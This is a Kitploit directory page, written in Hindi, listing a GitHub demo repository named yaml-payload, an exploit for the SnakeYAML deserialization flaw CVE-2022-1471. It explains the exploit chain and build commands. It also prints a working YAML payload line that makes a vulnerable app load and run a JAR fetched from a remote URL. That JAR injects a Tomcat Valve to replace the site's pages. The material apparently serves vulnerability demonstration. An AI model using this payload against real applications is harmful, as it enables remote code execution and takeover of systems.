Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
yaml-payload — SnakeYAML CVE-2022-1471 एक्सप्लॉइट पेलोड डेमो के लिए | Kitploit
उपकरण/GitHubGitHub/seal-sec-demo-2/yaml-payload
गतिशील विश्लेषण (सैंडबॉक्सिंग)भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubseal-sec-demo-2/yaml-payload

yaml-payload

SnakeYAML CVE-2022-1471 एक्सप्लॉइट पेलोड डेमो के लिए

रिपॉजिटरी देखें
36 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

yaml-payload

SnakeYAML deserialization शोषण पेलोड CVE-2022-1471 के लिए, artsploit/yaml-payload से अनुकूलित (मूल रूप से mbechler/marshalsec पर आधारित)।

यह क्या करता है

जब SnakeYAML के असुरक्षित Yaml.load() के माध्यम से लोड किया जाता है, तो यह पेलोड चल रहे एप्लिकेशन को नियंत्रित कर लेता है और इसे "You've Been PWNED" पेज से बदल देता है:

  1. एक Tomcat Valve इंजेक्ट करता है चल रहे Spring Boot ऐप में रिफ्लेक्शन के माध्यम से, मौजूदा पोर्ट 8080 को हाईजैक करता है — वही URL (किसी भी ngrok टनल सहित) अब PWNED पेज प्रस्तुत करता है
  2. ब्राउज़र को स्वचालित रूप से रीडायरेक्ट करता है — POST प्रतिक्रिया एक 302 रीडायरेक्ट भेजती है, इसलिए ब्राउज़र बिना मैनुअल रिफ्रेश के तुरंत PWNED पेज लोड करता है
  3. ब्राउज़र खोलता है स्वचालित रूप से सही URL पर (यदि उपलब्ध हो तो ngrok पब्लिक URL, अन्यथा localhost:8080)
  4. शोषण का सबूत प्रिंट करता है कंसोल/CI लॉग में

यदि Tomcat Valve इंजेक्शन उपलब्ध नहीं है (जैसे गैर-Spring ऐप), तो यह पोर्ट 9999 पर एक स्टैंडअलोन HTTP सर्वर शुरू करने और यदि ngrok चल रहा है तो स्वचालित रूप से एक ngrok टनल बनाने पर वापस आ जाता है।

यह स्थानीय रूप से macOS पर और CI/CD पाइपलाइनों (जैसे Ubuntu पर GitHub Actions) में काम करता है।

शोषण श्रृंखला कैसे काम करती है

SnakeYAML पेलोड Java SPI (Service Provider Interface) के माध्यम से को ट्रिगर करता है:

ScriptEngineManager
root@kitploit:~
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["https://raw.githubusercontent.com/seal-sec-demo-2/yaml-payload/main/yaml-payload.jar"]]]]
  1. SnakeYAML इस रिपॉजिटरी के yaml-payload.jar की ओर इशारा करते हुए java.net.URL को इंस्टैंशिएट करता है
  2. इसे रिमोट क्लासेस लोड करने के लिए URLClassLoader में लपेटता है
  3. ScriptEngineManager META-INF/services/javax.script.ScriptEngineFactory के माध्यम से AwesomeScriptEngineFactory की खोज और लोडिंग करता है
  4. फैक्ट्री का कंस्ट्रक्टर चल रहे Tomcat पाइपलाइन में एक Valve इंजेक्ट करता है, / पर प्रत्येक बाद की प्रतिक्रिया को PWNED पेज से बदल देता है

बिल्ड

JDK 17+ आवश्यक है:

root@kitploit:~
javac -d build src/artsploit/AwesomeScriptEngineFactory.java
cp -r src/META-INF build/
cd build && jar -cfv ../yaml-payload.jar . && cd ..

उपयोग

maven-demo प्रोजेक्ट में शोषण पेलोड के रूप में उपयोग किया जाता है। RCE ट्रिगर करने के लिए पेलोड स्ट्रिंग को ऐप के नाम फ़ील्ड में पेस्ट करें। अगली रिक्वेस्ट पर ऐप का पेज PWNED पेज से बदल दिया जाएगा। पूर्ण डेमो निर्देशों के लिए उस रिपॉजिटरी का README देखें।

टूल डाउनलोड करें